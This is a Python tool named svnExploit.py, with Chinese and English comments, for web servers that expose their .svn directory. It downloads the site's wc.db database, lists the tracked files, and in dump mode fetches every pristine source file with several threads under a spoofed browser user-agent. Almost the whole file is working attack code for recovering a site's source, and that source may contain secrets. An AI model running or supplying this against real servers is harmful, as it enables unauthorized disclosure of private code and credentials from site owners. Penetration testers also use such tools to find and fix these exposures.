#coding=utf-8
author = "AdminTony"


import requests,threading
import sqlite3,os,re,sys,optparse

"""
 * 全局变量定义区
"""
header={'accept':'text/html,application/xhtml+xml,application/xml',
        'user-agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Mobile Safari/537.36',
        'referer':'http://baidu.com'}


# Download wc.db from the target's exposed .svn directory.
def download_db(url):
    """Fetch <url>wc.db into dbs/<host>[(<i>)]/wc.db and return the local path.

    url -- base URL ending with a trailing slash (e.g. "http://host/.svn/").
    Exits the process when the server does not answer HTTP 200 for wc.db.
    """
    db_url = url + "wc.db"
    # Top-level directory that holds all downloaded databases.
    if not os.path.exists('dbs'):
        # Fixed: os.mkdirs() does not exist; the correct API is os.makedirs().
        os.makedirs('dbs')
    # Extract the host part of the URL and use it as the folder name.
    # NOTE(review): host-less URLs such as "http://localhost/" do not match
    # this pattern and would raise IndexError below — confirm intended input.
    pattern = re.compile(r'(?:\w+\.+)+(?:\w+)')
    host = pattern.findall(url)
    # If dbs/<host> already exists, fall back to dbs/<host>(i), i increasing.
    if not os.path.exists("dbs/" + host[0]):
        os.makedirs("dbs/" + host[0])
        path = "dbs/" + host[0]
    else:
        i = 1
        while os.path.exists("dbs/" + host[0] + "(" + str(i) + ")"):
            i = i + 1
        os.makedirs("dbs/" + host[0] + "(" + str(i) + ")")
        path = "dbs/" + host[0] + "(" + str(i) + ")"

    # Final on-disk location of the database.
    db_path = path + "/wc.db"
    # Download the database.
    res = requests.get(db_url, headers=header)
    if res.status_code != 200:
        print("[-] 未找到%s/wc.db" % url)
        sys.exit()
    with open(db_path, "wb") as f:  # renamed from "file": avoid shadowing the builtin
        f.write(res.content)
    return db_path

# Open wc.db and pull local_relpath / kind / checksum out of the NODES table.
def db_conn(db_path):
    """Return all (local_relpath, kind, checksum) rows from NODES in wc.db.

    db_path -- filesystem path of the downloaded wc.db.
    Returns the list of row tuples, or None when the database cannot be
    opened or queried (keeps the original best-effort contract).
    """
    conn = None
    try:
        conn = sqlite3.connect(db_path)
        cursor = conn.cursor()
        cursor.execute("select local_relpath,kind,checksum from NODES")
        return cursor.fetchall()
    except sqlite3.Error:
        # Narrowed from a bare except: only database errors are expected here.
        print("[-] wc.db连接失败!")
        return None
    finally:
        # Fixed: the connection was previously leaked on every call.
        if conn is not None:
            conn.close()

def print_values(values):
    """Print a header line, then one line per row whose filename is non-empty.

    values -- iterable of (local_relpath, kind, checksum) tuples as returned
    by db_conn(); rows with an empty local_relpath (the repo root) are skipped.
    """
    print("[+] 文件名 | 文件类型 | checksum")
    for name, kind, checksum in values:
        if not name:
            continue
        print("[+] %s   %s   %s" % (name, kind, checksum))

# Lazy iterator over the NODES rows, shared by the downloader threads.
def Gen_values(values):
    """Return a generator yielding only rows with a non-empty local_relpath."""
    return (record for record in values if record[0])


def down_file(url, db_path, Gen_value):
    """Worker body: drain the shared generator and download each file.

    url       -- base URL ending with a trailing slash (the .svn directory).
    db_path   -- local path of wc.db; files are stored in its directory.
    Gen_value -- generator of (local_relpath, kind, checksum) rows, shared
                 across all worker threads.
    """
    # Directory the files are restored into, e.g. dbs/127.0.0.1
    path = os.path.dirname(db_path)

    while True:
        try:
            value = next(Gen_value)
        except (StopIteration, ValueError):
            # StopIteration: generator exhausted. ValueError ("generator
            # already executing") can occur because the generator is shared
            # between threads without a lock; treat it as "done" too, which
            # matches the original bare-except behaviour.
            break
        rel, kind, checksum = value
        if kind == "dir":
            if not os.path.exists(path + "/" + rel):
                try:
                    # Fixed: os.mkdirs() does not exist; use os.makedirs().
                    os.makedirs(path + "/" + rel)
                except OSError:
                    pass  # another thread may have created it first
        else:
            # checksum is NULL when the file has been deleted from the repo.
            if checksum is None:
                continue
            # Strip the "$sha1$" prefix; pristine files are stored under the
            # first two hex chars of the checksum.
            checksum = checksum[6:]
            url_file = url + "pristine/" + checksum[:2] + "/" + checksum + ".svn-base"
            try:
                res = requests.get(url_file, headers=header)
            except requests.RequestException:
                print("[-] 下载%s失败!" % url_file)
                continue
            parent = os.path.dirname(path + "/" + rel)
            if not os.path.exists(parent):
                try:
                    os.makedirs(parent)
                except OSError:
                    pass
            with open(path + "/" + rel, "wb") as f:
                f.write(res.content)
                # Fixed: the success message used the failure prefix "[-]".
                print("[+] 下载%s成功!" % url_file)

if __name__ == '__main__':
    """
    命令行参数：
        svnExploit.py -u TargetURL [--dump --thread 5]
    """
    opt = optparse.OptionParser()
    opt.add_option("-u", "--url", action="store", dest="url", help="TargetURL e.g.http://url/.svn")
    opt.add_option("--thread", action="store", dest="thread_num", type="int", default=5,
                   help="The thread num default is 5")
    opt.add_option("--dump", action="store_true", dest="dump",
                   help="Dump file")
    (options, args) = opt.parse_args()
    if len(sys.argv) < 2:
        print("""svnExploit.py -u TargetURL [--dump --thread 5]
 -h 查看详细帮助
        """)
        sys.exit()
    if not options.url:
        print("[+] URL Error!")
        # Fixed: previously fell through with url=None and crashed later.
        sys.exit()
    url = options.url
    # Make sure the URL ends with a trailing slash before building paths.
    if not url.endswith("/"):
        url = url + "/"
    db_path = download_db(url)
    values = db_conn(db_path)
    if values is None:
        # db_conn already printed the error; nothing to list or dump.
        sys.exit()
    if not options.dump:
        # Listing mode: just show what wc.db contains.
        print_values(values)
    else:
        # Dump mode: one shared generator of rows, drained by N threads.
        Gen_value = Gen_values(values)
        threads = []
        for _ in range(options.thread_num):
            thread = threading.Thread(target=down_file, args=(url, db_path, Gen_value))
            thread.start()
            threads.append(thread)
        for thread in threads:
            thread.join()
        print("[+] 已经Dump完成!")
